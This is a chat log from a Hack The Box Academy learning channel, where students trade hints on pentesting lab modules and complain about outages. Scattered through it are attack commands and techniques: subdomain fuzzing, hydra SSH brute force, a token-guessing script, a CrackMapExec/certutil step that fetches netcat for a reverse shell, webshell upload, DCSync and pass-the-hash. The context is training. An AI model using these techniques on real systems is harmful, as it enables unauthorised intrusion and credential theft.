#modules

Indeed it did. Let's go.

@fresh compass i have problema too

ok I'm not the only one ahah, thought I was going crazy! just as I was about to hit 50% in the pentester path lol

darn, I can't even connect to the dashboard now...

same here, I guess someone at HTB tripped on the power chord or something

I think same, where are u at?

yeah I think pods being restarted now 😄

Live Engagement - shells and payloads.

Usually I would tryhard and do it within 2 months.

But I am in uni as well, so it's a bit challenging to manage.

So I'll just take my time.

nice keep grinding, I'm at AD right now, really need to finish the whole course in 60 days, I have like 60% to go.

u2 g

I am working full-time as well, taking care of toddler too lol tough time 😄

if you full time it it's possible, i'm at fuff right now and probably will be done beginning of january

@latent cave me too

https://tenor.com/view/party-dance-spongebob-techno-gif-4184920

Its working now

nice I just want to move to web part, I have some web background I think I can seed up the process

It doesn't connect to the dashboard

well if you have a backgground you're gonna go faster than me, this is my first foray in the world of IT/computer anything

I am not that experienced either, just did some pentesterlab and portswigger academy before, nothing hands on real projects. good work bud

ah nice, i'm planning on doing portswigger afterwards, how was it?

I think it's great, but you really need to start applying what you learn to real world projects, or do bug bounty, otherwise you will forget everything quickly.

makes sense

I feel HTB CBBH is really good too, I am planning to get an OSCP first, then do the CBBH and jump into bug bounty to practice. dunno how doable is that tho 😄

as long as you keep to it and enjoy it, anything's possible, I learned that from the power rangers, so it has to be true

well it's still not working, I guess that's a sign I should go to bed lol. good luck to you all

@latent cave jajajajaja

My lab spawn but I cannot get a connection

spanish? 🙂

Same, i'll come back later

Yes jajjaaja

me too, only us laugh that way 🤣

Jajaja well done

I thought it was because i wrote wrong, which also

hello guys, anyone also have problems entering the academy platform, is down right?

@elder crow yes! Look up

rough day for the servers

I see, for a moment when I was trying to resolve the domain dns couldn't find the address... I thought there was something with my connection but I see there isn't

guess someone hacked the box

https://tenor.com/view/tom-cruise-shades-cool-smug-cool-shades-gif-18677159

back up

https://tenor.com/bCVzX.gif

still waiting for my target to spawn 😢

yeah not happening atm it seems.

I had the luck for it to spawn like 1.5 hours ago.. but it was all jittery and eventually the connection just tanked

you working on cpts or cbbh

oh no.. I'm just doing modules.. not yet working on any cert 🙂

I got that error on my firefox browser at least

Academy its working fine again for me.

Academy is loading for me but boxes arent spawning

Again its not working :/

ah well, portswigger time then

Same here, the targets usually do not spawn at all and when they do I still can’t iteract with them

yeah, same situation here, boxes aren't spawning F

ahh! a late thank you sm

any help

Hi, I am stuck on Firewall and IDS/IPS Evasion - Medium Lab but am not able to figure out what the answer would be can I DM someone about it ?

Does it work?

The lab seems to work, but I am supposed to enumerate it but am not able to get the information required to answer the question

hi

I am wanting to pass this step but I can't: Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?

I have tried several options

gobuster vhost --useragent "PENTEST" --wordlist /usr/share/seclists/Discovery/DNS/namelist.txt --url https://inlanefreight.com/

wfuzz -H "Host: FUZZ.inlanefreight.com" --hc 404,403 -H "User-Agent: PENTEST" -c -z file,"/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" https://inlanefreight.com/

@spring trellis thank you. I am with the CBBH, otherwise I would help you. Ask in the cpts section better.

hey in "Locate a configuration file containing an MSSQL connection string." assessment 2 of AD

I can't find any file in any folder of the machines on the network...
am I missing something?
used ||smbmap|| with users: ||BR086|| & ||AB920||,
even tried ||rpcclient|| with ||BR086|| but nothing ...

You can try using ffuf

I'm sure there is something you may have seen, just scroll back the notes or with what you have you need to connect the "dots". Make sure to enumerate the ||SMB|| service and leave no stone unturned

Hello, folks. I was hoping I could please get some help with INTRO TO ASSEMBLY LANGUAGE. I am stuck on Procedures.
Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes)
I have tried an objdump, disas, and breaks. I am not really sure what the question is asking. When I did the breat from _start and stepped through everything, I tried every hex there just to try and pass this; no matter what I tried I cannot seem to pass

ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://inlanefreight.com -H "Host: FUZZ.inlanefreight.com"

in did...

that's what driving me crazy ...

Just take a break if needed and get back at it, there is clearly something standing out. One more tip and then I'm done, did you enumerate the user info for ||BR086 ||?

ffuf -w /path/to/vhost/wordlist -u https://target -H "Host: FUZZ" -fs 4242. Should be something like that

in rpcclient u mean?

no, you can get users information directly on the target host. You may want to revisit the net commands in case

splunk not working

Splunk - Discovery & Enumeration

open in nmap scan but cant reach the site

https?

yes

trying respawn

Then if it is still unreachable I don't know

i have a mess in my vpn since the issue they got yesterday/this morning

gonna redo all

||net ||commands ?

I'm just suggesting you can use whatever command you are comfortable with, there isn't a straight way to accomplish something to reach the end goal. I suggested the net command cause is the one I'm comfortable with and once I have enumerated the user ||BR086|| I have noticed that he could help me getting the config file

Re-enum the shares

-R '||Department Shares||' --dir-only

continue in this way

I did all ||public|| and ||Private||

don't give up, continue to enum

Im currently working on the module "using the metasploit framework". When i try to run eternal romance the target always times out. I am using PWNBOX. Anyone experienced issues too?

Yes, i have issues connecting to the boxes using RDP in the module "Password Attacks". I think there's a generalized problem

oh alright. Thanks.

can I DM ?

Thank you 🙂

feeling stupid rn but where tf is the browser application in this vm I rdp to

nvm just used the cli, weird there are no desktop icons for it

can someone help me with dante, i've got good start but would need some nudge?

#prolabs-dante

And if you can’t access that, #welcome

Currently doing the Skills Assessment of "Windows Event Logs & Finding Evil". First task, I dont get. I have to detect a hijacking attack, I filtered a little. But when working on that corresponding section, I was able to find the answer because I executed the binary myself and knew what I was searching for. But now I just have a bunch of events. Should I go through them one by one?

I honestly find this whole module very confusing and frustrating. Maybe thats the reason, why I dont get it 😄 Would love a nudge via DM anyway to get any kind of learning effect into this.

EDIT: Managed to get the answer. But just with bruteforcing. I have no clue and no learning effect with this.

getting these error

Working through the Active Directory module and at certain points it gives you ssh creds to connect to an internal Linux host.

I am having issues where the creds don't seem to work. Has anyone else experienced this?

Requested sever name not found.

why none given example working

It's 'htbdbuser'

ok its time tosleep

if it makes you feel better, theres someone making that exact same mistake on that section daily

its gotta be up there amongst the most common mistakes made in the whole course

I made that mistake... after doing it correctly

though not the funniest. That would be the rdp not hitting literally any button.

"It was just working... oh"

I am working on password attacks and I have created the mutated list for the zip file. This is where we are. No way I can wait that long lol. I have already waited 2 hours on it.

Attack a different service

Scanning now, instructions on that were not very clear, thanks

Ssh is a slow service, as you can see, always look before you leap

Good advice

This module gives you end goals but doesn't always give you the starting point

For one of them, you need to use a different user to extract the password of the user in the question

Also: save all passwords

This section reuses passwords and lab environments

All linux labs are connected and all Windows labs are connected

In SQL injection module and I can't run mysql. When I try: mysql -u root -p
It says me this: ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/run/mysqld/mysqld.sock' (2)

can someone help?

You need to specify a server

Otherwise it's just trying to do it on your own system

I'm trying this in hackthebox workstation on website

mysql -S $ip

You still need to specify the target

Send a screenshot of your full command

What I said still works out

Without specifying -S it's assuming you're connecting to a localhost server

I'm in thank you. I put mysql --host=... --port=.... -u root -p
and put the password and I'm in now 😄

-S is the shorthand for --host= btw

aha ok, didn't know that

And if it's default port, not necessary to specify

I literally said it a few minutes ago lol

hi y'all I'm looking for someone who's willing to help me with the question 11 from AD assessment II, basically I'd to discuss what I'm doing to see if I'm doing something wrong, anyone?

Guys what is the difference between machines and challenges on HTB?

not a question for #modules read the instructions in #welcome and access the rest of the server and you can find a better suited channel then.

Isn't it easier just to reply here man? But thanks anyway, I will check instructions,appreciate it

which one is the 11?

Easier for you, but thats not what the channel is for and filling it up with offtopic stuff just ruins the channel for people that are using it for what its meant for

I agree, appreciate it. Thanks for reply @thorn urchin

#1178777939278561481 message any help please 😊

hello guys im stuck on the last question of the DNS section in footprinting module.

i tried to enumerate subdomains to get the FQDN but no host with the IP x.x.x.203 did show up

i also tried to use dnsenum with the subdomains i found but still nothing

any hints will be appreciated

You should be using a fierce wordlists to find the right one

Step 1) dig axfr inlanefreight.htb @ip
Step 2) run dnsenum on those subdomains

thank you very much !!! i found it with that wordlist.

is there a way to make proxychains nmap scans faster.
I've tried specifiying, retries, rates,parallels, min-hostgroups, and nothing changed -> prolly means its a proxy problem not an nmap one. Sorta at wits end if anyone could give me a direction on this subj or tips

Eh Nmap doesn't play well with proxy

is it nmap or jus scannign in general

Nmap scanning I forget the full reason for it

do u hav an alternative

try with -sT -Pn

ive tried all relavent options alr

but ig im just asking if any1 has the same issue

Fun fact, you haven't tried all the relevant options if you don't have the correct answer 🙃

relevant nmap flags*

ligolo my beloved

full normal speed nmap scanning including udp and icmp

proxychains and nmap will always be slow cause youre forced to do a connect scan

There is also a decoy ip option in nmap
Haven't used it myself but read about it
Maybe it can be of use

that option does literally nothing here

i am really trying to filter some packets on wireshark,and i do frame contains " word" but i get 0 results.The "word" its on a specific column,followed by some staff.It starts with Word, ... .... ... .Why i cant make this work?any idea how to filter the packets about a wordinside a column?

Don't know much about it
Just read it somewhere before

the decoy IP option is a legacy feature that hasnt been relevant since the 90s

Im completely serious that isnt hyperbole

What it was for was cause back then scanning wasnt a widespread common thing. So it actually made sense back then to log scan attempts as an early precursor detection for an incoming attack, sometimes even preemptively blocking IPs in the process. Decoy scans was designed to multiple your scan traffic with fake dummies so that it was harder for the net admins to filter out which IP was actually malicious. And if you were auto blocking scan attempts then a decoy scan could make the target DoS themselves by blocking important IPs so it deinsentivized auto blocking like that.

These days the entire internet is being scanned 24/7 so it makes zero sense to take such an aggressive stance on simple scans. So the entire point of decoy scanning has ceased to exist. The only reason it remains an option today is because theres not a compelling reason to remove the feature as useless as it is.

<@&861185840277487616>

bro

I was just asking

and what youre asking is not allowed

please familiarize yourself with the #rules

where can I ask this question

You dont

careful with the language

classic mad buddy come in to troll

ok name 5 books

are u find the answer ?

Hi guys. I’m completely stuck on the last section of the proxy module socks over rdp. When I try to connect to the pivot host I get a message saying either the remote pc is not on, not connected to the network or not enabled. Any advice or hints would be seriously appreciated.

Module: Introduction to Splunk & SPL

I must be doing something wrong as I cannot for the life of me find the answer to the third practical exercise question. Can someone please help me to write the SPL query that will perform the necessary checks?

Makes sense

very interessting, didn't know that 🙂 thanks.

Some advantages to being an old hat that first started learning almost two decades ago lmao

Oh nice thats quite a lot 😄

how can i report if someone changed the password in the lab machine?

he changed the password and throw us out

the labs arent shared environments so that didnt happen

unless it wasnt a module lab in which case why are you asking in modules

not in a module.sorry where should i ask?

Nowhere, just reset the lab and move on with life

but asking in modules is the obviously wrong thing. Youre already verified and can see the full server so you should know better

mb

even general chat if you were totally clueless

anyone know if there's a walkthrough for the Windows attacks and Defense module? having difficulty

There's not gonna be a walk-through for any module above tier 0

A walkthrough would be useless. Finishing the module wont help you learn and understand any better.

If you're having difficulty just ask your question here and redact any spoilers by either substituting usernames with [first initial]*

this one : Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

Pth

can I DM?

admin to ms01?

I had a buddy tell me to get good I have to be glued to the computer 24/7 is that true

Not really

Practice makes you better

I use a samsung smart fridge

But when you're tired you're prone to make mistakes

I don’t get much time only a few hours a week,

Ok?

I haven't touched htb academy stuff in a week

I’m not sure if I’m learning or confusing myself

I’m in Linux right now

Probably both

Part of learning is confusion

It means you're outside your comfort zone

You are a good motivational speaker
Keep it up buddy

With computers that’s a def

I’m very lost but trying to make sense of stuff

Well if you're doing a learning module on htb academy ask here

Most people will genuinely be helpful, a few will just be Dicks about it

I’m not understand Linux at all

Understanding

Start with Linux module on academy
It is a great start for someone who is new to linux

Htb academy has a linux Fundamentals module

Install a generic linux distro as your new host. Use it as your daily driver. Whenever you have an issue or need to do something new, google how to till its working.

Easiest way to learn Linux

It's hard to find something in linux that isn't documented, or in some ask forum with your same issue

Most of my fixes I've found on askubuntu

chatgpt for basic commands is also generally okay

I will have to check out, I think it’s the basic computer knowledge I lack

Also when googling, if you can, avoid being too specific with the distro, most of the time "how to do x in Linux" will suffice

idk why pth is not working for me with ms01...

even for issues that have nothing to do with Ubuntu lul

the arch wiki too

Like someone the other day mentioned some sort of error that amounted to "you're doing it wrong "

because the arch wiki assumes youre trying to fix some obscure 20 year old system running inside a shoe box off dialup still and will give you the most intricate and hyper specific fixes to solve an issue

Though that was a windows/ldap error

True

Also sometimes the issue is the tool you're using is a new version, and the command no longer works the same

9 out of 10 times an archwiki fix works no matter what your setup is

Getting Started > Pentesting Basics > Public Exploits
I've scanned using nmap, and see a few services running (chargen, ssh, ldp, upnp). My initial thought is to target OpenSSH 8.4p1.
When using searchsploit openssh it comes up with ~ 6 results. (searchsploit openssh 8.4p1 has 0 results.) I then start using Metasploit: search exploit openssh

At this point, it shows one result: unquoted_service_path

Looking at the options for unquoted_service_path, it seems to all be local (i.e. I can't target the remote server). Any thoughts outside of the hint on where I should continue?

the other ports , udp scans

that's probably because the ssh service is not vulnerable, you only need to scan the port given, and maybe take a look with your browser

Nmap is not the way to figure it out

yo stop what youre doing

Youre provided a public IP and port

-_- Thank you three...

absolutely do NOT be full scanning the IP and trying to run random exploits against it!

thats a REAL box

only be testing the provided port

dont accidentally commit a crime while learning lol

I think they've accounted for people scanning the full ip

That's not the point

I would certainly hope so

Im not saying theyd succeed but the severity needs to be understood

that's indeed true

You only test the scope of whats provided or else youre committing crime

It's a good point to be made -- and may even warrant an addition to the lesson

The point is you're given a public ip and port

It's assumed you know the difference between a public and private IP

A reminder never hurts

Also, to clarify, I never ran any random exploits against the server

(Or any, for that matter)

it doesn't matter here since it's a test environment, but in the real world, don't throw anything against targets which you're not cleared to attack

Of course

Is there anyone here able (or rather willing, since I bet most are able) to help me fix my VM. I've been working for 2 days now on a lab and only now realized it was my vm that wasn't working. The pwnbox works but often blanks on me and I have to refresh the page.

I did nothing to the vm that im aware of but I guess I must have changed something in the config files unintentionally

its just a virtual machine. Wipe it and load a new one.

Usually the first thing I do after a new VM install and update is create a new snapshot to act as my 'baseline' and I revert to that if something really breaks

VMs are meant to be semi disposable

always make a golden copy

especially with hacking distros where youre likely to be installing and messing around with bleeding edge unstable software

I suppose, I changed it around a bit for better workflow and have some notes (a while ago when it was still working fine) but I suppose i can do it again

And yea, I always forget to snapshot fresh installs. One day I'll learn. Maybe today is that day

no better incentive than immediately after suffering for not doing it

i lost my vm with like 125 boxes or something and learned to always make snapshots

was able to recover the notes but had to rebuild all the tools

any important data should be backed up or synced off VM

ya i use obsidian on a different box now for my notes

was still a cherry tree homie then

but in hindsight it helped me learn a lot more making a vm build with more experience understanding what the tools do and stuff

I figured out the exploit for that section. Thank you @thorn urchin , @fathom pendant , @next bronze
I'm more than a little embarrassed for making the mistake I did and wish there was a gentler approach to correction, but lessons learned.

Fear does the heart good

and congrats and GL in future sections

In the "Windows Event Logs & Finding Evil" skill's assesment question no3. It asks to determine the process that injected into the process that executed unmanaged PowerShell code. Any hints on that? I revisited all the sections, kinda stuck here! Any help is appreciated

which sysmon id are you initially looking for?'

DETECTING WINDOWS ATTACKS WITH SPLUNK - Detecting Ransomware. I've modified the splunk search for file deletions and the number doesn't seem to be the correct answer. I've tried filtering out some things and tried several different numbers and no go. Is there something I'm missing here? Feel free to DM.

I got my answer, thanks anyways

Figured it out nvm

Hi, how did you do skill assesment question 3, just curious since I went back to it to try and figure out how to give hints

My hint would be to go back to module, see the example log, then try to manufacture something that would catch it.

You have to look for event ID that creates a remote thread 😉 (Can't give any spoilers)

Pm?

Sure

AD Enumeration & Attacks - Skills Assessment Part I

I want to find the IP of MS01

Can anyone pass the nslookup command for it , i tired many ways but not working

there are a lot of ways to get/dump dns records, the simplest is just to ping the hostname in a domain joined computer

noobie here that needs some help

“List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called ‘flag’ and submit the contents of the flag.txt file.”

I am having trouble with the smbclient command. I cant login with the given credentials (Bob:Welcome1).

I input < $ smbclient -N -L \0.0.0.0 > followed by < $ smbclient -U bob \0.0.0.0\users >
and then used “Welcome1” passkey but it is not going through and throwing an “NS_STATUS_ERROR_CODE” at me…

Anyone else having this issue or find a solution for this?

Module name?

and section

Fundamental Module "Getting Started" page 7 section "Service Scanning"

either use \\\\ip\\share or //ip/share

smbclient -U bob \\\\IP\\users

gunna try dis

did that, input the given password, and still get NS_STATUS_ERROR

in that case what even is an ns status error?

probably cause the syntax is wrong

ok so how do i go about this then because i am literally following what htb is telling me to do

wait

let me check

Sorry but it's working see

For the password you have to read the section crefully

yeah

thanks

welcome

Can anyone help me in this..? Please

I've already replied to you earlier

there are a few ways of getting the IP, just recall the basics

hey wsp guys 🫡

Found it
some unexpected issues was going on in running the command

At last worked

Hey everyone I've had a weird issue with Elastic Stack from the SIEM module. I pulled up the pwnbox in my browser and it says to access Elastic Stack through "http://[target ip]:5601" . I'm starting to feel stupid cuz it just wouldn't connect. Has anyone had this issue before?

Give it like 5 minutes

https://www.hackthebox.com/achievement/machine/1742266/394

dm me if you still have problems

read the #rules keep spamming shit like that and you'll get the 👢 up your ass

<@&861185840277487616>

I seem to have issues with getting Splunk to work in
Module: Attacking Common Applications
Section: Splunk - Discovery & Enumeration

From what I gathered from the information in the module and later my nmap scan, is that splunk webserver should be accessible on port 8000 of the target machine. When I attempt to I get this:

the protocol is https

are ... ah fook you're right I got so used to it being http I didn't even bother. Thanks.

any time

hello everyone, I'm doing the ffuf Skills Assessment and I'm fuzzing for pages. Is it normal that as soon as I add a subdomain, ffuf gets ridiculously slow? I added them to /etc/hosts...

need help on this

be more accurate

help with what exactly, what have you tried

is not normal

i tried converting the displayed date into epoch time using python datetime

then got md5 hash of it and compared it

import datetime
import hashlib

for offset in range(-100000, 100000):
    total_seconds = round(datetime.datetime.strptime("2023-11-28 12:33:05pm", f"%Y-%m-%d %I:%M:%S%p").timestamp()*1000) + offset
    hash = hashlib.md5(f"htbuser{total_seconds}".encode('utf-8')).hexdigest()
    print(hash)
    if hash == "5b1c00978e854710fb95c5438dcf54ee":
        print(f"Found it!!! {total_seconds}")
        break

i solved it with bruteforce

but i dont remember exactly from the top of my head

can check later

whats wrong with my approach

imma try to use hashcat lol

LOL it worked

wtf the token is not being accepted

what 🤣

but these token are not being accepted why

let me try find my python script

even this is not working :(

im losing patience im just gonna bruteforce the tokens on server now

nvm i just realised i cant

hi im stuck on module Using Crackmapexec skill assessment question 2.
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt

already got 2 user a* and s* but i don't know what next move.
any hint ?

what ever i do it doesnt work wtf

have u try more than and less than 1 sec

yes everythiing

what i remember i was collect token and hit api in different script

this too doesnt work

this module is garbage

try +-2

maybe it my frikin internet, imma try from pwnbox

pov: htb trying to make you rage

sometimes u need refresh page first

it doesnt work in pwnbox either

predictable token more like impossible to predict token

its possible

i tried so many different methods, none of them works

good day friends, i am at Skill Assessment Broken Authentication, i finally got to the ||support ||account but cant find the admin panel, and hint please

how did you do token one pls tell

?

i hate this

let me find it, give me a minute

can someone help me with intro to assembly language : shellcoding tools? I already get the required shellcode, but when I enter the shellcode, it said 'failed to run shellcode'? thx

this can help you : https://forum.hackthebox.com/t/broken-authentication-predictable-reset-token-question-1/268453/3

i see no code in thar

can someone DM me and help me with intro to assembly language : shellcoding tools? I really have no idea how to generate the shellcode to cat for flag.txt, thank you

On the "Password Mutations" Section in "Password Attacks" I created a wordlist using

"hashcat --force ./password.list -r ./custom.rule --stdout | sort -u > mut1_password.list"

and used hydra to brute force:

"hydra -l sam -P ./mut1_password.list ssh://10.129.138.117"

However no results. Am i doing sth wrong here ?

Can someone help on AD Enumeration & Attacks - Skills Assessment Part II Q7: Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I am logged in, with xp_cmdshell get a powershell rev. shell, but it seems there is no Desktop folder for the administrator user and could not read the flag. Tried to JuicyPotato, but no luck.

anyone give some advice on the footprinting lab - easy? I am trying to get in via FTP on port ||2121|| using this: ||ftp //ceil:qwer1234@10.129.114.126 2121 or ftp ceil@10.x.x.x 2121|| and all I keep getting when doing it is that fact that it doesn't ask for a password and when I do ls - it says ftp> not connected. Thoughts?

check for a "passive" way to get the files. Wget is mentioned in the section..

@unique palm - i did try this ||wget -r --user=ceil --password=qwer1234 ftp://10.129.234.216 #Download all|| - but I received no results.

try ||wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136|| dont forget to change port

@candid lily could u solve it

@bright quiver worked ?

no

i just moved to next one

i lost hope to solve it :(

@unique palm - right now it is sitting here

and I get a bunch of retries:

||-2023-11-28 15:28:52-- (try: 3) http://2121/
Connecting to 2121 (2121)|0.0.8.73|:80... failed: Connection timed out.
Retrying.||

if u want i dm u my solution

yes please

Yo, guys I am at the Live Engagement on shells and payloads.
I have a question:
I used xfreerdp and obtained credentials for Apache Tomcat.
The problem is that the first target only opens up from the 10.129 ( where i used xfreerdp)
My problem is the following: How can I open up the 172.16.1.11:8080 if there's no search engine.
Do I have to use TOR?

Can anyone tell me how to keep my server save and How do hackers can hack my server so that i can be carfeful???

anyone have any issues with footprinting easy and grabbing files with wget? I keep getting eh above retry issues and nothing getting downloaded

What was the exact cmd you tried?

try wget //<ip>/<filename>

Without using http/s

open a terminal and type firefox

Where are you at the moment, which section?

@upper ruin right now I am trying this ||wget -m --no-passive ftp://ceil:qwer1234@10.129.234.216||

will try that in a sec, hope it works

Which section is that>

I have my whole footprinting module documented, i can give u guidance.

@upper ruin the easy lab

Ah, one sec.

For some reason nothing seems to be working as usual...I am trying to get in with or retrieve files with port ||2121||

Did you open it up in firefox?

@upper ruin no - didn't try web

You can use gobuster to enumerate the sub/files.

You can maybe use gobuster on the IP with the specific port and get some interesting stuff.

Once you do that you could get to the directory list.

tried that earlier before reverting machine and it didn't grab anything - i cvan try again, but used basic ftp@victim IP and I got in with ceil/password and can ls -la

Did you try ssh with the credentials?

not sure what changed now, but couldn't do that before

Which ports are open?

||21/2121/22||

Good, which one of these you haven't enumerated fully.

@upper ruin i can see the|| id_rsa|| now - so I should be able to get in ssh after getting it

Maybe you can input the target ip in the search bar and try the usual stuff. index.html/ admin/admin.php

Yup, right path.

@upper ruin thanks for the advice/guidance...mind if I DM you if i get stuck going forward?

Holy sh it WORKED.

Yessir, anytime.

Ah..there's a catch.

@upper ruin thanks a ton

Should I dm it to you now, or later?

Just remember, SSH key may not be restricted to 1 role...maybe a higher privileged role could have the same ssh key.

Ah, nvm that was other box.

You r good.

@upper ruin I think i have to chmod, but let me see what's what...oh that's what you mean lol ok

@upper ruin got in

Nicee.

Remember, you can always use advanced commands. ls -la is much better than just ls

yup - got flag....man that first portion made it longer than needed lol

yessirrr

??

Well, enable the only ports that you need.

Make sure to configure the services accordingly.

If you use ftp for example remove anonymous login.

Apply firewall with rules.

Zero trust ain't a bad idea.

EDR such as aurora won't be a bad start at the os that supports your server.

What else...depends on what you use it for.

and how can people hack into my server?? Will none will be able to hack if i use 2 step vrif??

2 step vrif can be bypassed

But it's hard.

we talk about 2fa, right?

Wanna make sure we don't misunderstand.

any help

But without Loging my actual account How can someone bypass they need to know my number? ... I know not to click on any QR code 😓

I am in the module Password Attacks and attacking SAM. When i try to create a SAM dump it says you need higher privs? Anyone got a hint ?

I am on the Password Attacks Module, section "Remote Password Attacks" any assitance would be greatly appreciated!

where U got stuck?

need a bit help in the last 2 Q of the AD assessment 2

if anyone can help please

Doing kerberos moduel Unconstratined Delegation part and have this question "Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt"

I've ran rubeus to monitor for tickets, used the spoolsample to get the DC01 tgt, performe a dcsync with user ||brian.willis|| re-issued a ticket using their ntlm hash and then imported but still getting access denied

has anyone done this? Unsure where I am going wrong as methodology seems fine, but clearly making a mistake Edit: solved this, further user enumeration is required to resolve.

i need help with the last portion of getting started module, knowledge check. i am scanning the ip address, enumertating over it, im just stuck on what exploit to use or how to progress to actually gain the foothold

Hi everyone, can anyone help me with the shell and payload module?

I'm stuck in the phpwebshell module, I follow all the steps described by the module, but I can't load the webshell on the site, the steps I take are these
-I download the web shell

• I unzip it and see the 'webshell' file
  -now I go to the IP address that htb generated for me
• I enter with my credentials
  -go devices->vendor
  --I open burpsuite and go to the proxy section
• I open the browser settings and in the proxy section I set 127.0.0.1 with port 8080
  -I go to the web and add new
  -I enter the credentials and using the browse button I find the .php file
  -I save,
  This is where the problems begin:
  1, the page loads endlessly
  2, burpsuite seems to have done its job but the web page never stops loading,
  I don't understand what the problem is, can someone tell me where I went wrong and what? can you give me some suggestions?
  ​

pls my friend, txt me

😦

😢

can anyone please help me, i am asking for 4 days now, i am at Broken Authentication username injection, tried to add the userid field but didnt work because of the oldpass doesnt match, tried to fuzz it, tried remove it, tried to change to GET method and changing the submet, but no luck so far

please any hint

nobody give a fu.. about us bro

yh

i dont understand

what

this, what do you mean

yh

i agree with u bro

sad reality

❤️

we never be a professional hacker

with nobody help us

yh

Y'all need to be patient

till when

till when we die

lol

Someone who's done the module has to drop by to be able to help, people are volunteering their time to help others, you're not entitled to it

I help people when they need it, not when I feel like it.

yh

i can help u if i finished what u want

same

can i dm u

so, you dont have finished that module?

of course feel free

which?

shell e payload

its been a while, yes i did

oh i just saw ur message, give me some time

k

can i please dm u?I like to understand where I'm wrong, to arrive at a solution

it's for u

i was talking to @vital zephyr , i had no dm from u

anytime my friend

someone can help?

I tried to connect with ||CME ... -x certutil.exe ... nc.exe 172.16.7.240 4444 || didn't worked
I don't know what other way I got to connect to DC01 ...

anyone else got problems with PWNBOX rn? No matter what region i select it says no instances avaible

if you can use crackmap to execute a command, you can use psexec to get a system shell

hey everyone, im having a problem with the hacking wordpress module "directory indexing" section. i get an error in every directory i try to visit

Hello team, anyone knows how do i find the user, ip and pass of the Hackthebox so I can enter via ssh with openvpn and do my exercises?

They have an outage, support told me

what? this doesnt make any sense. just follow the openvpn instructions

Hello i'm trying to hax NASA with html, what is the first step?

@madfOx Im already connect to the openvpn in my terminal, whats next? because yesterday I had a "username" and password to connect via ssh

follow the instructions in the module

@next bronze im doing "Linux Fundamentals" "Working with Files and Directories" and I dont see any instructions... 😦

https://academy.hackthebox.com/module/18/section/78

scroll down and spawn the target

I dont see that option

thats whats driving me crazy

Hi! Im a noob. Just starting with the first module. I cant launch the Pwnbox terminal for the first section. Did I read correctly that the servers are down?

get verified by following the instrucstions at #welcome , and send a screenshot here

seems like it

Awesome! Thanks! 🙏

but the the command wasn't executed, otherwise I should have got a reverse shell

then you don't have admin access

use openvpn from htb

umm Im just starting, not sure where to find that. Any directions would be greatly appreciated. 🙂

openvpn is used to connect your own virtual machine, if you're using the in browser pwnbox, that's not applicable to you

well im not sure now but i had similar problem and after i connect to htb vpn works fine,,, didnt use htb some time i had some project outside

so U implying to use section "ACL Abuse Tactics" ...

the server is fine ...

Thanks @next bronze

So, if if I want to verify my account on Discord, Do I have to have a VIP sub? I cant find the Account Identifier in My Settings.

I'm not implying anything, I'm just saying that if you can't execute commands with cme, then you don't have admin access, anyways cme will tell you by showing a P3wned tag before that

no, you just need an account on the main platform

Wierd. I cant find the identifier in the settings.

academy is separate from the main platform, you need to create a account here https://app.hackthebox.com/home

Ah. Perfect! Thanks!

at the bottom of the page

why are the characters randomly bolded, am I having a stroke

its an extension

Bionic reader extension, helps me focus when reading 😁

helps reading, esp for some types of dyslexia or adhd

yup

oh didn't know that, interesting

there's some legit research on that and a special paid app for that lmao

but the extension is unrelated and free

don't reveal your token here

you need a / before the identify command

sorry

it's unique and personal to you alone

but every time I wrote this "/" I get some kind of an error/warning

that's pretty neat

what error?

GOT IT Thanks

Got it also @hallow kiln

Thanks

nice

yeah ...
that what messing me up
I can't get anything to run on ms01

but there's no local admin user for dc01 ...

Theres no identifier dupe protection so someone can steal your identifier and impersonate your account with an alt 🙂 which could lead to your htb account getting banned on accident

Do you have a DA user?

what is DA?

Domain Admin

U mean CT*** user?

If thats a user you have access to is a DA then yeah

I was asking you a question, Im not psychic 😂

If you have a DA user you can DCSync to get the DC admin hash. If THAT cant get shell then nothing will.

Getting error no available instances on all pwnbox locations

Any recommendations on the best Linux system to install?

if you're using it for hacking, parrot or kali

services are down for now

Thanks! @next bronze

is there like a server status page to check or is that a non-standard situation?

https://status.hackthebox.com/

Gigachad

Hey, guys, has anyone done "Credential hunting in Linux" section of the module "Password attacks" ?

Nope youre the first person to ever attempt it, congratulations!

I got it. Basically I was trying the username Kira (as the hint was saying ---> sudo hydra -l Kira -P mut_Kira_password.list -T64 ssh://10.129.202.64

But instead it should have been "kira"

Maybe the hint should be slightly modified 😅

I mean also, don't attack ssh

Yeah should be ftp

Thanks I learned something new

Hint gives you a person's name, often in linux environments the username will be lowercase

I will keep in mind

It's called using your noggin

Yeah but sometimes when you try many things without success, your noggin works less and less

after a break it starts working again

idk sometimes I find a weird sense of inspiration and insight when in the absolute pits of despair

Same here

Pwnbox seems to be back up

By the way, I am doing the penetration tester path and enjoying it so much

It's really well done

could anyone help with footprinting lab -hard?

Be more specific

i found the private key

trying to ssh

asking for password

┌──(root㉿kali)-[~/.ssh]
└─# ssh root@10.129.246.0 -i id_rsa
root@10.129.246.0's password:
Permission denied, please try again.
root@10.129.246.0's password:

what makes you think that key is for the root user

Chmod 600 id_rsa

i did chmod 600

i tried bob and tom from the email

its not root

Where did you get the ssh key from

root was the last thing i tried

From the mail?

yes

It was

Private key could be used to ssh to root

Are you sure the format of the key is correct? @final mica

In like 90% sure the key wasnt for the root user

┌──(root㉿kali)-[~/.ssh]
└─# ls -la
total 20
drwx------ 2 root root 4096 Nov 28 16:26 .
drwx------ 9 root root 4096 Nov 28 16:26 ..
-rw------- 1 root root 3381 Nov 28 16:24 id_rsa
-rw-r--r-- 1 root root 563 Nov 27 16:42 id_rsa.pub
-rw-r--r-- 1 root root 710 Nov 28 16:03 known_hosts

And I’m 100% sure I used it to ssh to root

It’s in my notes

mmkay

This is your own ssh folder

Looks weird

And you run as root

😰

